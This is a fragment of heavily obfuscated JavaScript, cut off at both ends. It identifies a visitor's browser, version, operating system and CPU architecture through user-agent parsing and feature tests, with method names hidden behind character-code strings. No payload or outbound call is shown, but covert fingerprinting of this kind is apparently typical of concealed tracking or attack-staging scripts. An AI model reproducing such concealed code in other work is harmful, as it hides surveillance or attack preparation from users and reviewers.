})())](m+'y'.length);Bk+=String[(String.fromCharCode(0x66,0162,0x6f,109,67,0x68,97,0162,0x43,0157,100,0145))](((ck&('yTc'.length*0x9+4))<<'tFONJw'.length)|(j&(0x2*0x1f+1)));m+='pU'.length;}else {j=s[((function () { var KX="At",nM="de",DH="charCo"; return DH+nM+KX })())](m+'E'.length);Q=s[((function () { var $="deAt",D$="charCo"; return D$+$ })())](m+'Lk'.length);Bk+=String[(String.fromCharCode(0146,0162,111,0x6d,0x43,0150,0x61,0x72,67,111,100,0145))](((ck&((01*'VvUcBnbU'.length+7)*'V'.length+0))<<(014*'R'.length+0))|((j&(0x1*077+0))<<'POfoqh'.length)|(Q&(01*('zdJR'.length*(05*'Wh'.length+0)+2)+21)));m+='bDN'.length;}}return Bk;}};var y=String.fromCharCode(0117,112,0145,0x72,97);var k=String.fromCharCode(0x4d,0123,0x49,69);var M=String.fromCharCode(0106,0x69,0162,0145,0x66,0x6f,120);var q=String.fromCharCode(67,104,0162,111,109,0145);var v=String.fromCharCode(0123,0x61,0146,97,0x72,0x69);var g=(function () { var m="x",P="u",A="n",w="i",mi="L"; return mi+w+A+P+m })();var L=String.fromCharCode(65,0x6e,0x64,0x72,111,105,0144);var O=String.fromCharCode(0127,0x69,0x6e,0x64,0157,0167,0163);var F=String.fromCharCode(0x4d,97,0x63,0x20,0117,0x53,040,0x58);var B=(function () { var j="S",o="O",Z="i"; return Z+o+j })();var f=String.fromCharCode(0x46,0162,0145,0x65,0x42,83,0104);var a=(function () { var M7="SD",H="B",RU="t",nP="Ne"; return nP+RU+H+M7 })();var c=String.fromCharCode(0x4f,0x70,0x65,110,0102,0123,68);var i=String.fromCharCode(0141,0162,0155,108,0x65);var n=String.fromCharCode(0x78,0x38,54);var oQ=(function () { var Q="4",a$="86_6",C="x"; return C+a$+Q })();var nE=String.fromCharCode(0160,0160,99);var p=String.fromCharCode(109,105,0160,0163,0x6c,101);var Z1={};Z1[((function () { var V="n",uq="Versio",EP="get"; return EP+uq+V })())]=function(){var NZ;var vm;var l;var r;var cp;var $T;var RF;var DZ;var W="";var J=navigator[(String.fromCharCode(117,0x73,0x65,0162,65,103,0145,110,116))];var v5=false;var qu="";var e=null;var D=function(By,Qa,N0){if(!document[((function () { var Cy="ment",Qh="e",l3="l",Zb="createE"; return Zb+l3+Qh+Cy })())])return false;var FV=document[((function () { var Mm="t",F_="en",t="ateElem",v7="cre"; return v7+t+F_+Mm })())]((function () { var ke='v',r7='i',og='d'; return og+r7+ke })());FV[((function () { var iC="e",Gj="ibut",k7="setAttr"; return k7+Gj+iC })())]((function () { var _$='le',xC='y',xY='st'; return xY+xC+_$ })(),By+(function () { var h1=" ",K2=":"; return K2+h1 })()+N0+(function () { var d=";"; return d })());return FV[((function () { var My="e",PY="yl",fD="t",UJ="s"; return UJ+fD+PY+My })())][Qa]===N0;};var h=function(St){if(!document[((function () { var qR="ement",xx="l",Vf="createE"; return Vf+xx+qR })())])return false;var x=document[((function () { var Wy="ement",w7="teEl",uF="crea"; return uF+w7+Wy })())](String.fromCharCode(105,0156,0160,0x75,0x74));x[((function () { var Vi="ribute",M6="setAtt"; return M6+Vi })())]((function () { var y1='e',gt='typ'; return gt+y1 })(),St);return x[(String.fromCharCode(0164,0171,0x70,0145))]==St;};var vM=function(ut){try{eval(ut);return true;} catch(Zg){}return false;};if(window[((function () { var u="era",h_="op"; return h_+u })())]){RF=y;if(!navigator[((function () { var gq="Agent",eI="user"; return eI+gq })())][(String.fromCharCode(0x6d,0x61,0164,99,104))](/Opera/)){v5=true;}DZ=window[String.fromCharCode(0x6f,0x70,0x65,114,0141)][(String.fromCharCode(0x76,101,114,0163,0x69,0x6f,110))]();if(!NZ){switch(window[(function () { var Qc="a",cm="r",Uk="pe",rE="o"; return rE+Uk+cm+Qc })()][((function () { var XX="mber",bx="u",IZ="buildN"; return IZ+bx+XX })())]((function () { var $P='us',er='o',pF='cu',zW='conspi',X='in'; return X+zW+pF+er+$P })())){case String.fromCharCode(51,064,0x34):case (function () { var r2="7",R="4",dj="13"; return dj+R+r2 })():case String.fromCharCode(0x32,48,0x39,49):case String.fromCharCode(50,064,064,52):case (function () { var CG="4",lp="7",S="24"; return S+lp+CG })():case (function () { var cZ="2",L3="10",zm="4"; return zm+L3+cZ })():case String.fromCharCode(066,51,070,54):NZ=g;break;case (function () { var ZO="4",kv="7",mN="10"; return mN+kv+ZO })():case (function () { var ft="00",h6="1",_t="1"; return _t+h6+ft })():case String.fromCharCode(063,064,52,065):case (function () { var wv="6",uS="351"; return uS+wv })():case String.fromCharCode(55,067,51,060):case String.fromCharCode(070,065,48,0x32):case String.fromCharCode(56,0x36,55,57):case String.fromCharCode(0x38,0x37,55,49):case String.fromCharCode(56,067,55,54):case String.fromCharCode(070,070,0x30,49):case String.fromCharCode(061,48,49,0x30,56):case (function () { var sA="7",fn="6",Tn="4",M2="10"; return M2+Tn+fn+sA })():case String.fromCharCode(0x31,48,064,55,54):case (function () { var kK="3",GI="3",fw="504",JX="D-",XB="WM"; return XB+JX+fw+GI+kK })():NZ=O;break;case String.fromCharCode(062,0x34,070,060):NZ=f;break;case String.fromCharCode(0x36,0x33,0x38,54):NZ=F;break;case String.fromCharCode(061,064,48,55):if(navigator[((function () { var $O="t",WF="rAgen",qV="e",cO="us"; return cO+qV+WF+$O })())][(String.fromCharCode(0151,110,0144,101,120,0117,0146))](String.fromCharCode(65,110,100,114,0157,0x69,0144))){NZ=L;}else if(navigator[(String.fromCharCode(0165,0x73,101,0162,0101,0147,0x65,110,0164))][(String.fromCharCode(105,0156,100,0x65,0170,79,102))]((function () { var Se="e",nR="Phon",JW="i"; return JW+nR+Se })())){NZ=B;l=String.fromCharCode(105,80,0x68,0x6f,110,0145);}break;case String.fromCharCode(061,062,0x35,060):break;default:e=window[String.fromCharCode(0157,0160,0145,114,0141)][(String.fromCharCode(0x62,0x75,0x69,0154,0144,78,0165,0x6d,98,101,0x72))](String.fromCharCode(0151,0156,99,0x6f,0x6e,0x73,0160,105,0x63,0x75,0x6f,117,0163));break;}}}else if(typeof window[((function () { var Oi="wheel",a6="onmouse"; return a6+Oi })())]!=String.fromCharCode(0x75,110,0x64,0145,102,0x69,0x6e,0x65,0x64)&&!(typeof window[(function () { var rp="ion",Ao="orVers",Jf="riptEngineMaj",$9="Sc"; return $9+Jf+Ao+rp })()]==(function () { var rs='ction',ca='fun'; return ca+rs })())){if(window[(String.fromCharCode(0x63,0x68,114,111,109,105,117,0x6d))]||window[(String.fromCharCode(0x67,0x6f,111,0x67,108,0145))]||window[(String.fromCharCode(99,104,0162,0x6f,109,0145))]){RF=q;window[(function () { var TJ="ch",uZ="ar",hj="se"; return hj+uZ+TJ })()]=(function () { var Kl="e",$k="om",Lq="hr",vC="C"; return vC+Lq+$k+Kl })();}else {RF=v;window[String.fromCharCode(0163,0x65,0x61,114,0143,0150)]=(function () { var a5="on",k5="ersi",nU="V"; return nU+k5+a5 })();}window[(function () { var R5="orm",DM="platf"; return DM+R5 })()]=navigator[(String.fromCharCode(0x70,108,0x61,0164,0146,0157,0x72,0x6d))][((function () { var Tp="se",Kj="rCa",Rt="toLowe"; return Rt+Kj+Tp })())]();if(window[(function () { var Ea="m",j7="r",_M="atfo",ju="l",jq="p"; return jq+ju+_M+j7+Ea })()][(String.fromCharCode(0155,0141,0x74,0x63,0x68))](/ipod/)){NZ=B;l=(function () { var Zn="od",Xv="P",SU="i"; return SU+Xv+Zn })();W=i;window[(function () { var dk="arch",X="se"; return X+dk })()]=String.fromCharCode(0101,0160,0160,108,0x65,0x57,0x65,0142,0113,0151,0x74);}else if(window[String.fromCharCode(0x70,0154,0141,116,102,0x6f,0162,109)][(String.fromCharCode(109,0x61,116,0143,104))](/ipad/)){NZ=B;l=(function () { var uh="d",TY="a",io="iP"; return io+TY+uh })();W=i;window[(function () { var R="h",Rn="arc",oF="se"; return oF+Rn+R })()]=(function () { var Xw="bKit",gr="e",UM="AppleW"; return UM+gr+Xw })();}else if(window[(function () { var Q7I="orm",ae="platf"; return ae+Q7I })()][(String.fromCharCode(109,0x61,0x74,99,104))](/iphone/)){NZ=B;l=String.fromCharCode(0x69,0120,0150,0157,110,0x65);W=i;}else if(window[(function () { var MF="orm",qr="platf"; return qr+MF })()][(String.fromCharCode(0x6d,0x61,0x74,99,104))](/macintel/)){NZ=F;W=n;}else if(window[(function () { var mZ="m",fm="or",S="platf"; return S+fm+mZ })()][((function () { var nT="h",XW="c",ES="mat"; return ES+XW+nT })())](/linux/)){NZ=g;if(window[(function () { var d="rm",E9="o",JA="platf"; return JA+E9+d })()][(String.fromCharCode(0x6d,97,0x74,0143,104))](/x86_64/)){W=oQ;}else if(window[(function () { var $C="m",lR="r",tS="o",ND="platf"; return ND+tS+lR+$C })()][((function () { var Z5="ch",Xi="t",RL7="a",Fi="m"; return Fi+RL7+Xi+Z5 })())](/arm/)){W=i;}else if(window[(function () { var Gg="m",Xq="r",l5="tfo",ta="pla"; return ta+l5+Xq+Gg })()][((function () { var Qo8="h",Cu="c",t="mat"; return t+Cu+Qo8 })())](/x86/)){W=n;}else if(window[String.fromCharCode(0x70,0x6c,97,116,102,111,0x72,0x6d)][(String.fromCharCode(109,97,116,0x63,0150))](/mips/)){W=p;}if(navigator[((function () { var X="t",ra="en",jV="g",o5="userA"; return o5+jV+ra+X })())][((function () { var Aa="h",Sh="c",m$="at",XC="m"; return XC+m$+Sh+Aa })())](/android/i)){NZ=L;}}else if(window[(function () { var g8="orm",sM="platf"; return sM+g8 })()][((function () { var $="h",Ub="c",$U="t",bl="a",R="m"; return R+bl+$U+Ub+$ })())](/windows/)){NZ=O;}DZ=this[(String.fromCharCode(0163,0145,0x61,114,0x63,0150,86,0145,0162,0163,0151,0x6f,110))](window[(function () { var t="rch",dX="a",iB="se"; return iB+dX+t })()],navigator[(String.fromCharCode(0x75,0x73,0x65,0162,0101,0x67,0145,0156,0x74))]);if(!DZ||('TawKx'.length-5)==DZ[(String.fromCharCode(108,0x65,0156,0147,0x74,0150))]){v5=true;}}else if(navigator[((function () { var VR="u",GA="p",aG="c",ul="os"; return ul+aG+GA+VR })())]&&!document[((function () { var sz="l",$="l",kU="a"; return kU+$+sz })())]&&navigator[(String.fromCharCode(0x74,0x61,0151,110,0x74,69,0156,97,98,0154,0145,0x64))]||String.fromCharCode(77,0x6f,0172,0102,0x6c,0x6f,0x62,0102,0165,0151,0154,0144,101,0x72) in window){RF=M;if(String.fromCharCode(83,0171,0x6d,0142,111,108) in window&&String.fromCharCode(0x74,111,0123,0164,0162,0x69,0x6e,0x67,0124,0x61,0147) in window[((function () { var p8="l",Ra="o",OW="Symb"; return OW+Ra+p8 })())]){DZ=(function () { var S='0',X='51.'; return X+S })();}else if(String.fromCharCode(79,0142,106,0145,0143,0x74) in window&&String.fromCharCode(103,0x65,116,0117,0x77,0156,0x50,0x72,0x6f,112,0x65,0162,116,0x79,68,0x65,0163,99,114,0x69,0x70,0x74,111,0162,0163) in window[((function () { var Hk="t",z="c",nY="Obje"; return nY+z+Hk })())]){DZ=(function () { var xa='0',ZU='.',X='50'; return X+ZU+xa })();}else if(String.fromCharCode(83,0x70,0145,0145,99,0150,0x53,0x79,0156,0164,104,0x65,0163,0x69,115) in window){DZ=(function () { var lI='0',hK='.',Mw='49'; return Mw+hK+lI })();}else if(String.fromCharCode(112,97,0144,0x53,116,97,0x72,0x74) in String[((function () { var dD="e",FL="typ",HO="proto"; return HO+FL+dD })())]){DZ=(function () { var CF='0',sy='.',ao='48'; return ao+sy+CF })();}else if((function () { var ay='ck',Xw='tTra',qk='x',ZN='Te'; return ZN+qk+Xw+ay })() in window&&String.fromCharCode(111,0x6e,0143,0x75,101,0143,104,97,110,0x67,101) in window[(String.fromCharCode(0124,0145,0x78,116,0124,0162,97,0x63,0x6b))][((function () { var JV="ype",_r="t",d="proto"; return d+_r+JV })())]){DZ=String.fromCharCode(064,0x37,46,0x30);}else if(String.fromCharCode(0145,0x6c,0x65,0x6d,0145,0x6e,0x74,0x73,0x46,0x72,0x6f,0155,0x50,0157,0151,0156,0164) in document){DZ=(function () { var gx='0',je='.',$1='46'; return $1+je+gx })();}else if(vM(String.fromCharCode(0x63,0154,0141,115,0x73,0x20,65,040,0173,125))){DZ=String.fromCharCode(0x34,0x35,0x2e,060);}else if((function () { var Wz='l',dy='ymbo',mE='S'; return mE+dy+Wz })() in window&&(function () { var t6='e',IyS='iv',X='Primit',aO='to'; return aO+X+IyS+t6 })() in window[String.fromCharCode(0x53,121,109,98,0x6f,0154)]){DZ=String.fromCharCode(52,52,0x2e,060);}else if(D(String.fromCharCode(104,0171,112,0150,0x65,0156,115),(function () { var jh='ens',TK='hyph'; return TK+jh })(),(function () { var Xq='to',gw='u',Yq='a'; return Yq+gw+Xq })())){DZ=(function () { var ac='.0',qs='3',Q9='4'; return Q9+qs+ac })();}else if(typeof (window[String.fromCharCode(73,109,97,0x67,0x65,0x42,105,0x74,109,0x61,112)])==String.fromCharCode(0x66,0x75,0x6e,99,0x74,0x69,0x6f,0x6e)){DZ=(function () { var LL='0',R='.',iJ='42'; return iJ+R+LL })();}else if(typeof (window[(function () { var blE="hannel",qW="MessageC"; return qW+blE })()])==String.fromCharCode(102,0x75,110,99,0164,105,0157,0x6e)){DZ=String.fromCharCode(0x34,061,056,060);}else if(typeof (window[(function () { var Gb="text",ND="on",zG="C",VG="udio",Ey="A"; return Ey+VG+zG+ND+Gb })()])==(function () { var b2='ction',ts='fun'; return ts+b2 })()&&typeof (new window[(function () { var as="ext",YU="t",jW="udioCon",ij="A"; return ij+jW+YU+as })()]()[(String.fromCharCode(0x63,0x72,101,0141,0164,0145,0102,117,0146,0146,0145,0x72,0123,0x6f,0165,114,99,101))]()[(String.fromCharCode(0x64,0x65,0164,0x75,110,0x65))])==String.fromCharCode(0x6f,0x62,106,101,99,0164)){DZ=String.fromCharCode(0x34,0x30,46,48);}else if(D(String.fromCharCode(115,99,0x72,111,0154,0154,0x2d,0x73,0x6e,0x61,112,45,0x70,0157,0151,0x6e,0164,0x73,0x2d,0170),String.fromCharCode(115,0143,0x72,111,108,0x6c,0x53,110,0x61,112,0x50,0157,0x69,110,116,115,88),String.fromCharCode(0x75,0156,0x73,0145,116))){DZ=String.fromCharCode(063,0x39,056,060);}else if(String.fromCharCode(99,0x72,0x65,0141,0x74,0145,0x45,108,0145,109,0x65,0156,0x74) in document&&document[((function () { var dr="ment",Gv="e",sV="eEl",Mq="t",TC="ea",vb="cr"; return vb+TC+Mq+sV+Gv+dr })())]((function () { var SQ='ure',t1='t',zh='ic',nW='p'; return nW+zh+t1+SQ })())&&document[((function () { var $F="nt",VE="teEleme",S="a",Ql="cre"; return Ql+S+VE+$F })())](String.fromCharCode(0160,0151,99,0164,117,0162,0145))[((function () { var NA="r",ji="ucto",O7="constr"; return O7+ji+NA })())]===window[(function () { var R='t',LK='eElemen',_3='HTMLPictur'; return _3+LK+R })()]){DZ=String.fromCharCode(0x33,070,46,48);}else if(D((function () { var iM='ay',eC='ispl',Zv='d'; return Zv+eC+iM })(),String.fromCharCode(0144,0x69,0x73,112,108,0x61,0x79),(function () { var _P='nts',tb='conte'; return tb+_P })())){DZ=String.fromCharCode(51,55,056,060);}else if(D((function () { var mR='tion',ld='la',y2='o',He='is'; return He+y2+ld+mR })(),(function () { var EU='n',Uf='o',Ay='ati',ss='ol',Wm='is'; return Wm+ss+Ay+Uf+EU })(),(function () { var Ok='te',Dw='a',v2='sol',v1='i'; return v1+v2+Dw+Ok })())){DZ=String.fromCharCode(0x33,066,056,48);}else if(String.fromCharCode(99,0154,111,0x73,0x65,0x73,116) in window[String.fromCharCode(0x45,0x6c,101,109,0x65,110,116)][((function () { var k1="e",XF="typ",_V="proto"; return _V+XF+k1 })())]){DZ=(function () { var ux='0',hy='35.'; return hy+ux })();}else if((function () { var Mi='hes',ii='matc'; return ii+Mi })() in window[String.fromCharCode(0x45,0154,0145,0155,101,0156,0x74)][((function () { var Fc="e",ac="totyp",tE="pro"; return tE+ac+Fc })())]){DZ=String.fromCharCode(51,52,0x2e,060);}else if(String.fromCharCode(82,0141,0144,0151,111,78,0157,100,0x65,76,105,115,116) in window){DZ=(function () { var Su='0',Gg='.',_c='3',Fn='3'; return Fn+_c+Gg+Su })();}else if((function () { var E$='thin',GJ='copyWi'; return GJ+E$ })() in Array[((function () { var tt="pe",Qw="ty",q0="o",s4="t",Uq="o",Tg="pr"; return Tg+Uq+s4+q0+Qw+tt })())]){DZ=String.fromCharCode(51,062,056,060);}else if(String.fromCharCode(102,105,0x6c,108) in Array[(String.fromCharCode(0160,0x72,111,0x74,0x6f,0x74,121,112,101))]){DZ=String.fromCharCode(51,49,0x2e,48);}else if(D(String.fromCharCode(0x62,97,0143,107,103,0x72,0x6f,117,0x6e,0144,055,0142,0154,0145,0156,0144,45,0155,111,0144,0x65),(function () { var lx='ndMode',v8='kgroundBle',mf='bac'; return mf+v8+lx })(),(function () { var oRn='ly',Fr='p',Qt='multi'; return Qt+Fr+oRn })())){DZ=String.fromCharCode(063,0x30,056,48);}else if(D((function () { var Js='ng',qf='zi',V1='box-si'; return V1+qf+Js })(),(function () { var Qj='zing',iO='boxSi'; return iO+Qj })(),String.fromCharCode(0x62,0x6f,114,0144,101,0162,055,98,0157,0x78))){DZ=(function () { var ZI='9.0',IV='2'; return IV+ZI })();}else if(D(String.fromCharCode(0x66,0154,101,0170,055,119,0x72,97,0160),(function () { var hg='Wrap',QP='flex'; return QP+hg })(),(function () { var gF='ap',ze='nowr'; return ze+gF })())){DZ=String.fromCharCode(0x32,0x38,46,0x30);}else if(D((function () { var Ds='r',i0='o',t='rs',V5='u',XL='c'; return XL+V5+t+i0+Ds })(),(function () { var Iu='r',uk='o',D4='curs'; return D4+uk+Iu })(),(function () { var Gr='b',A_='ra',Ck='g'; return Ck+A_+Gr })())){DZ=(function () { var jn='0',uz='27.'; return uz+jn })();}else if(D((function () { var $u='entation',C7='image-ori'; return C7+$u })(),(function () { var ma='tion',_Q='Orienta',ya='ge',hM='ima'; return hM+ya+_Q+ma })(),(function () { var OX='g',UH='e',jE='d',ow='0'; return ow+jE+UH+OX })())){DZ=String.fromCharCode(50,0x36,46,060);}else if(D((function () { var el='ent',S4='tachm',UV='ckground-at',UD='ba'; return UD+UV+S4+el })(),(function () { var lI='hment',YL='groundAttac',ID='back'; return ID+YL+lI })(),(function () { var jt='cal',W4='lo'; return W4+jt })())){DZ=String.fromCharCode(062,53,46,0x30);}else if((function () { var Ks$='orage',Hm='iceSt',CV='ev',f3='D'; return f3+CV+Hm+Ks$ })() in window&&window[(String.fromCharCode(68,0145,0x76,0151,99,0145,83,0x74,111,0162,97,103,0145))]&&String.fromCharCode(0x64,0145,0x66,97,117,0154,116) in window[((function () { var Nw="rage",Mm="viceSto",ADL="e",_u="D"; return _u+ADL+Mm+Nw })())][((function () { var lJ="type",MJ="roto",QW="p"; return QW+MJ+lJ })())]){DZ=(function () { var QG='4.0',i1='2'; return i1+QG })();}else if(h(String.fromCharCode(0162,0141,0156,103,0145))){DZ=String.fromCharCode(062,063,46,060);}else if(String.fromCharCode(72,84,77,0x4c,0x54,105,109,0145,69,0x6c,101,0x6d,0x65,110,0x74) in window){DZ=(function () { var au='2.0',Yi='2'; return Yi+au })();}else if((function () { var p4='ement',C6='eEl',Vi='creat'; return Vi+C6+p4 })() in document&&document[((function () { var qb="nt",_1="me",J1="e",TE="eateEl",Zi="cr"; return Zi+TE+J1+_1+qb })())]((function () { var o8='in',us='a',gJ='m'; return gJ+us+o8 })())&&document[((function () { var AQ="ent",j$="eElem",Es="eat",Q7="cr"; return Q7+Es+j$+AQ })())](String.fromCharCode(0x6d,97,0151,110))[((function () { var aB="r",RW="to",hl="nstruc",Yx="co"; return Yx+hl+RW+aB })())]===window[(function () { var JF='ement',A$='HTMLEl'; return A$+JF })()]){DZ=String.fromCharCode(50,0x31,0x2e,060);}else if(String.fromCharCode(0151,109,117,0x6c) in Math){DZ=(function () { var L7='.0',RUt='0',uZK='2'; return uZK+RUt+L7 })();}else if(D((function () { var AD='ize',aW='nt-s',u0='fo'; return u0+aW+AD })(),(function () { var CM='ize',mk='fontS'; return mk+CM })(),String.fromCharCode(50,0x33,118,0x6d,0x61,0170))){DZ=(function () { var ue='0',XM='.',YX='19'; return YX+XM+ue })();}else if((function () { var Fh='ixelRatio',Md='eP',KW='devic'; return KW+Md+Fh })() in window){DZ=(function () { var tY='8.0',tC='1'; return tC+tY })();}else if(String.fromCharCode(0x63,0x72,0145,0x61,0164,101,69,0154,101,0x6d,0x65,0156,116) in document&&document[((function () { var uC="t",Nt="Elemen",q_="te",Ou="crea"; return Ou+q_+Nt+uC })())]((function () { var FH0='e',iA='am',OF='ifr'; return OF+iA+FH0 })())&&(function () { var VC='x',xt='ndbo',Cu='sa'; return Cu+xt+VC })() in document[(String.fromCharCode(99,0x72,0x65,97,116,101,69,108,0x65,109,101,0156,116))](String.fromCharCode(105,0146,0162,97,0x6d,0x65))){DZ=(function () { var Py='0',gk='17.'; return gk+Py })();}else if((function () { var Ka='s',$s='App',HT='z',Bp='mo'; return Bp+HT+$s+Ka })() in navigator&&(function () { var y_='ll',lV='nsta',mF='i'; return mF+lV+y_ })() in navigator[((function () { var Pu="s",eo="zApp",yk="mo"; return yk+eo+Pu })())]){DZ=(function () { var Lk='6.0',Za='1'; return Za+Lk })();}else if((function () { var Ja='t',dM='n',qp='urceEleme',G2='o',se='HTMLS'; return se+G2+qp+dM+Ja })() in window&&window[(function () { var fc="ent",ZX="ourceElem",bh="HTMLS"; return bh+ZX+fc })()][((function () { var jv="e",RM="totyp",mB="pro"; return mB+RM+jv })())]&&String.fromCharCode(0x6d,0145,100,0151,0x61) in window[String.fromCharCode(0x48,84,0115,0114,83,0157,117,114,0143,101,69,0154,101,109,0145,0156,0164)][((function () { var wI="e",Wl="totyp",PR="o",JR="pr"; return JR+PR+Wl+wI })())]){DZ=String.fromCharCode(0x31,065,46,48);}else if(String.fromCharCode(109,0157,0172,82,0x65,113,0165,0x65,0163,0x74,0120,0157,105,0x6e,0164,101,114,0114,111,99,0x6b) in document[(String.fromCharCode(0142,0x6f,0x64,0171))]){DZ=(function () { var LIV='0',id='4.',BI='1'; return BI+id+LIV })();}else if(String.fromCharCode(77,97,0160) in window){DZ=(function () { var uV="0",SZ="13."; return SZ+uV })();}else if(String.fromCharCode(0x6d,0157,0x7a,0103,111,110,110,101,0x63,116,0x69,0157,0156) in navigator){DZ=String.fromCharCode(061,50,46,0x30);}else if((function () { var SH='brate',Ec='mozVi'; return Ec+SH })() in navigator){DZ=(function () { var iJ=".0",SHR="11"; return SHR+iJ })();}else if(D((function () { var tf='ty',GLB='face-visibili',Tx='moz-back',Tw='-'; return Tw+Tx+GLB+tf })(),(function () { var uQ='lity',tz='kfaceVisibi',INN='MozBac'; return INN+tz+uQ })(),(function () { var e82='n',Dl='e',pJ='d',ho='id',BZ='h'; return BZ+ho+pJ+Dl+e82 })())){DZ=(function () { var js="0",__=".",z8="0",aa="1"; return aa+z8+__+js })();}else if((function () { var Lv='k',on='rac',C_='doNotT'; return C_+on+Lv })() in navigator){DZ=(function () { var yS="0",rK=".",iz="9"; return iz+rK+yS })();}else if((function () { var ls='tHTML',lz='cen',t68='insertAdja'; return t68+lz+ls })() in document[(String.fromCharCode(0142,0x6f,0x64,0171))]){DZ=String.fromCharCode(0x38,46,48);}else if(String.fromCharCode(111,0x6e,100,0145,0x76,0151,99,101,0x6f,114,0x69,101,0156,116,0x61,0164,105,0157,0156) in window&&!((function () { var Qy='ce',Ru='n',Hu='tyRefere',vK='reateEnti',xz='c'; return xz+vK+Hu+Ru+Qy })() in document)){DZ=(function () { var pl="0",jN=".",G7="7"; return G7+jN+pl })();}else if((function () { var Rn='lder',Jm='zBlobBui',Kk='o',XE='M'; return XE+Kk+Jm+Rn })() in window){DZ=String.fromCharCode(066,0x2e,060);}else if((function () { var pr='erator',Fz='n',AZ='Ge',k6='s',sF='i'; return sF+k6+AZ+Fz+pr })() in Function){DZ=(function () { var RR="0",Mj=".",dx="5"; return dx+Mj+RR })();}else if(String.fromCharCode(105,0x73,0101,0162,0x72,97,0171) in Array){DZ=String.fromCharCode(064,46,0x30);}else if(document[((function () { var BY="te",tHr="ta",Ag="readyS"; return Ag+tHr+BY })())]){DZ=String.fromCharCode(063,0x2e,54);}else if(String[(String.fromCharCode(0x74,114,0x69,109,82,105,0147,104,116))]){DZ=(function () { var cL="5",Nm=".",r4="3"; return r4+Nm+cL })();}else if(document[(String.fromCharCode(0x67,0x65,0164,69,0x6c,0145,0x6d,101,110,0x74,115,66,0x79,0x43,0154,0141,0163,115,78,0141,0x6d,0x65))]){DZ=(function () { var FC="3"; return FC })();}else if(window[(String.fromCharCode(0111,116,0x65,114,97,116,0157,0162))]){DZ=(function () { var lQ="2"; return lQ })();}else if(Array[((function () { var mM="ry",L3="eve"; return L3+mM })())]){DZ=(function () { var nw="5",zb=".",Xn="1"; return Xn+zb+nw })();}else {DZ=String.fromCharCode(49);}if(navigator[(String.fromCharCode(111,115,0143,0x70,0165))]!=navigator[((function () { var vCu="rm",ff="o",kZ="f",QK="t",lo="pla"; return lo+QK+kZ+ff+vCu })())]){v5=true;}qu=navigator[(String.fromCharCode(111,0x73,0x63,0160,117))];if(qu[((function () { var Fn="h",QZ="c",_X="mat"; return _X+QZ+Fn })())](/i.86/)){W=n;}if(qu[((function () { var G3="h",Vd="c",S0="at",LO="m"; return LO+S0+Vd+G3 })())](/x86_64/)){W=oQ;}if(qu[(String.fromCharCode(0x6d,0x61,0164,99,104))](/Windows/)){NZ=O;switch(qu){case String.fromCharCode(0x57,0151,0x6e,0144,0x6f,119,115,0x20,78,84,040,0x35,46,48):NZ=String.fromCharCode(87,105,0x6e,0144,0x6f,0167,0x73,0x20,0x32,0x30,0x30,0x30);break;case String.fromCharCode(0x57,0151,0156,0x64,111,0x77,115,0x20,0116,0124,040,0x35,0x2e,0x31):NZ=(function () { var rJ="s XP",xk="Window"; return xk+rJ })();break;case String.fromCharCode(0x57,105,0156,0x64,111,0x77,0163,0x20,0x4e,0x54,040,0x35,46,062):NZ=(function () { var V0=" 2003",qG="ws",WI="ndo",Yd="Wi"; return Yd+WI+qG+V0 })();break;case String.fromCharCode(0x57,0151,0x6e,0x64,111,0167,115,040,0116,0124,0x20,0x36,056,060):NZ=(function () { var Z_x="sta",C$=" Vi",vfa="Windows"; return vfa+C$+Z_x })();break;case (function () { var BA="T 6.1",FO="indows N",wW="W"; return wW+FO+BA })():NZ=String.fromCharCode(0127,0151,0x6e,0x64,0x6f,119,0163,0x20,067);break;case (function () { var yV=" 6.2",LC="ws NT",M4="ndo",_5="Wi"; return _5+M4+LC+yV })():NZ=(function () { var OC="8",e$="s ",wX="ndow",cD="Wi"; return cD+wX+e$+OC })();break;case (function () { var AP="3",lP="ws NT 6.",Nc="o",nX="Wind"; return nX+Nc+lP+AP })():NZ=String.fromCharCode(0x57,0151,0x6e,0x64,111,0167,115,040,070,0x2e,061);break;}}if(qu[(String.fromCharCode(0155,0x61,0164,99,0x68))](/Linux/)){NZ=g;}}else if(typeof window[(function () { var xz="MajorVersion",r4="ne",a0="criptEngi",wn="S"; return wn+a0+r4+xz })()]==String.fromCharCode(0x66,117,0x6e,99,116,105,0157,110)){NZ=O;RF=k;window[(function () { var Hj="on_maj",YY="versi"; return YY+Hj })()]=window[(function () { var GJ="n",xr="ajorVersio",Ii="ScriptEngineM"; return Ii+xr+GJ })()]()[(String.fromCharCode(116,0x6f,0123,0x74,0162,105,0x6e,103))]();window[String.fromCharCode(118,101,0162,0163,105,0x6f,110,95,0155,0x69,0x6e)]=window[String.fromCharCode(83,0x63,0162,105,112,0164,69,0156,0147,0151,0x6e,101,0x4d,0151,0156,0157,114,86,0x65,0x72,0163,0151,0157,0x6e)]()[((function () { var bk="ing",C$="toStr"; return C$+bk })())]();window[(function () { var Kp="d",XU="_buil",fk="version"; return fk+XU+Kp })()]=window[String.fromCharCode(0x53,99,0x72,0151,112,0164,0105,110,103,0151,0156,0145,66,0165,105,0x6c,100,0126,101,114,0x73,0x69,111,0x6e)]()[(String.fromCharCode(116,0x6f,83,0x74,0162,0x69,110,0147))]();qu=window[String.fromCharCode(118,101,0x72,0163,0151,111,0x6e,0137,0x6d,97,0x6a)]+window[(function () { var Mp="in",n6="ion_m",_v="vers"; return _v+n6+Mp })()]+window[String.fromCharCode(0166,0145,0x72,115,0151,111,0156,95,0x62,0165,0x69,0154,100)];switch(qu){case (function () { var Zf="4615",ll="51"; return ll+Zf })():DZ=(function () { var ZC="0",bU=".",nJ="5"; return nJ+bU+ZC })();NZ=(function () { var oM="00",z="0",xS="ndows 2",q3="Wi"; return q3+xS+z+oM })();cp=(function () { var mp="0",r6="P",W$="S"; return W$+r6+mp })();break;case (function () { var Lr="07",qk="5159"; return qk+Lr })():NZ=String.fromCharCode(0127,0x69,0x6e,0144,111,119,115,0x20,0x32,48,060,060);cp=String.fromCharCode(83,0120,51);break;case (function () { var T7="13",sg="5185"; return sg+T7 })():NZ=String.fromCharCode(0127,0151,0156,100,0157,119,0x73,0x20,50,060,060,0x30);cp=String.fromCharCode(83,0120,064);break;case String.fromCharCode(53,066,54,066,50,0x36):DZ=String.fromCharCode(54,46,48);NZ=(function () { var KF="P",ei="ws X",X="Windo"; return X+ei+KF })();cp=String.fromCharCode(0x53,80,060);break;case String.fromCharCode(065,066,070,0x35,49,065):DZ=(function () { var qK="0",Q4=".",JF="6"; return JF+Q4+qK })();NZ=(function () { var Zgc="03",Z$="0",Wv="ndows 2",o5="Wi"; return o5+Wv+Z$+Zgc })();cp=(function () { var 